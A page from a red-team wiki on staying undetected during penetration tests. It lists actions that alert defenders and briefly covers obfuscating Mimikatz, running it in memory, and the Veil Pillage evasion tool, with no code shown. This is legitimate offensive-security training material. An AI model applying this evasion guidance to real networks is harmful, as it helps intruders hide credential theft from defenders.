DarthSidious
  • Darth Sidious
  • GETTING STARTED
    • Getting started
    • External network access to Domain Admin
    • Intro to Windows hashes
  • Building a lab
    • Building a lab
    • Preparing Kali
    • Building a small lab
    • Building a lab with ESXI and Vagrant
    • Cuckoo malware analysis lab
  • Initial access
    • Password spraying
    • Initial access through exchange
  • ENUMERATION
    • Powershell
    • BloodHound
    • PowerView
    • Azure enumeration
  • Execution
    • Pass the hash
    • Responder with NTLM relay and Empire
    • DeathStar
    • CrackMapExec
  • Privilege escalation
    • Mimikatz
    • Token Impersonation
    • Juicy Potato
    • ALPC bug 0day
  • Defense evasion
    • Bypassing Applocker and Powershell contstrained language mode
    • From RDS app to Empire shell
    • Stealth
  • OTHER
    • Link encyclopedia
    • Writeups
      • lkylabs v1
    • War stories
      • Domain admin in 30 minutes
  • Credential access
    • Password cracking and auditing
  • Command & Control
    • SILENTTRINITY
Powered by GitBook
On this page
  • General
  • Using DLLs
  • Obfuscating mimikatz
  • Veil Pillage
  1. Defense evasion

Stealth

This chapter is about staying stealthy and opsec safe. That means not getting caught by the blue team on engagements.

General

These are some key things we must avoid

  • Putting files on disk

  • RDP in to boxes

  • Trigger pop-ups on desktops

  • Changing account passwords

  • Locking out users

  • Changing group membership of accounts

  • Changing existing settings and files

  • Changing GPOs permanently

  • Messing up Kerberos tickets

  • Triggering alerts from security products like AV

  • Killing processes you don't own

  • Any sort of DOS

  • Leaving files and tools

  • Not cleaning up

Using DLLs

Obfuscating mimikatz

Any sysadmin with half a brain can now write and something to stop most common ways of executing mimikatz. Since we don't want to get caught we could obfuscate Mimikatz numerous ways.

  • Running to memory either through Powershell or through meterpreter (will probably get you caught)

Veil Pillage

Veil Pillage is a post exploitation tool and a part of the Veil framework intended for staying undetected through obfuscation.

PreviousFrom RDS app to Empire shellNextLink encyclopedia

Last updated 7 years ago

Changing some basic things that will be triggered by signature, see:

https://pentestlab.blog/tag/rundll32/
https://gist.github.com/imaibou/92feba3455bf173f123fbe50bbe80781
https://github.com/Veil-Framework/Veil-Pillage